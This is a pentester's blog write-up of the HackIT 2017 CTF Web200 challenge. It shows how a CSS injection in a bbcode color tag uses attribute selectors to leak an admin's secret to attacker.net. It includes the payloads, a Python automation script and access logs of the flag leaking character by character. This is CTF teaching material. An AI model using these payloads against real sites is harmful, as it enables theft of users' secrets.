CTF Write-Up - HackIT CTF 2017 Web200

August 27th, 2017

I participated at the HackIT 2017 CTF with team sec0d, and we finished first. As requested by some other teams, here’s a write-up for the Web200 CTF challenge of HackIT 2017.

Introduction

The application seems pretty straightforward, we can register with an username, a password, and a secret. The goal of the challenge is to recover the secret of an administrator.

Solution

Checking the source of the profile page, we can see some interesting information:

First, the secret is shown in an input tag. We can see that we can edit part of our profile as well by using edit.php. This page will edit the “about” field of our user. We can also see that there is an administrator function commented in the html, hinting us of a potential XSS or similar attack, as the administrator will have a list of updated status in his dashboard.

XSS tentatives will be proven to be unsuccessful, as we do not have access to the < and > characters and we are not in an attribute. A bbcode function is however enabled on the application, allowing us to input interesting data, for example, [code]Message[/code] will be translated to <pre>Message</pre>. Testing all possible bbcodes, one, in particular will be interesting to us, color.

The color bbcode injected, we can see the result:

As shown in the screenshot, the parameter “test” is inserted inside a style tag, and since other characters are not correctly filtered, we can do a CSS injection:

[color="test;} * {background: url('http://attacker.net/test')"]a[/color]

Using that as input will change the background image of some HTML tags and generate a request to our website.

80.252.154.43 - - [27/Aug/2017:02:05:01 +0200] "GET /test HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"

Now that we know we can inject CSS and that there is effectively a bot running on the app, we can try to recover the input value using attribute selector in CSS:

[color="test;} input[value^="h4ck1t" i]{background: url('http://attacker.net/confirmed')"]a[/color]

This will check if the value of the input starts with h4ck1t, the i modifier after the selector is there to be case insensitive, since the page will lowercase all input value sent.

After sending that, we got our response, the flag format being h4ck1t{flag}, we can confirm that we only have to automate the attack :)

The server and bot being somewhat unreliable, we had to try everything manually. On a stable challenge, this challenge could be solved using a loop checking the character one by one.

from pwn import * from requests import * import string import sys import time def edit(s, cookie, bla): s.post("http://tasks.ctf.com.ua:13373/edit.php", cookies=cookie, data={"about": bla}) s = Session() cookie = {"PHPSESSID": "85gdkck3eegdmu215o02ac8rq0"} bla = '''[color="test;} input[value^="'''+sys.argv[1]+'''" i]{border-image: url('http://attacker.net/?a='''+ sys.argv[1]+'''"]a[/color]''' log.info("Sending [%s, %s]" % (i, bla)) edit(s, cookie, bla) edit(s, cookie, bla) r = s.get("http://tasks.ctf.com.ua:13373/profile.php", cookies=cookie) print r.text

Usage: python web200.py 'h4ck1t{c...'

And finally, in our logs, after a little bit of guessing and a sleep() time of 10 seconds…

80.252.154.43 - - [27/Aug/2017:04:11:51 +0200] "GET /?a=h4ck1t{c$$0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:12:04 +0200] "GET /?a=h4ck1t{c$$_0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:13:21 +0200] "GET /?a=h4ck1t{c$$_10;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:14:06 +0200] "GET /?a=h4ck1t{c$$_1n0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:14:12 +0200] "GET /?a=h4ck1t{c$$_1nj0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:14:52 +0200] "GET /?a=h4ck1t{c$$_1nj30;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:15:17 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n1;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:15:45 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:16:20 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:18:34 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:27:18 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:32:09 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:33:02 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h10;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:41:10 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:43:22 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d30;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:45:39 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d30;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:48:12 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:48:47 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:49:08 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:49:37 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:49:57 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s30;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:50:09 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s3c0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:50:22 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s3cr3t0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:51:12 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s3cr3ts0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:51:24 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s3cr3ts}0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"

Bonus

After solving the challenge, a friend I did the CTF with told me there could be a faster solution than bruteforcing the characters ourselves, even on unreliable servers. It is possible to simply create a lot of selectors, like h4ck1t{[a-z0-9] and by sending one request, the server will answer us with one character.

Dany Bach

A generic security blog by a pentester.
Belgium, Paris and now Leeds

CTF Write-Up - HackIT CTF 2017 Web200

Introduction

Solution

Bonus

Share Post

Dany Bach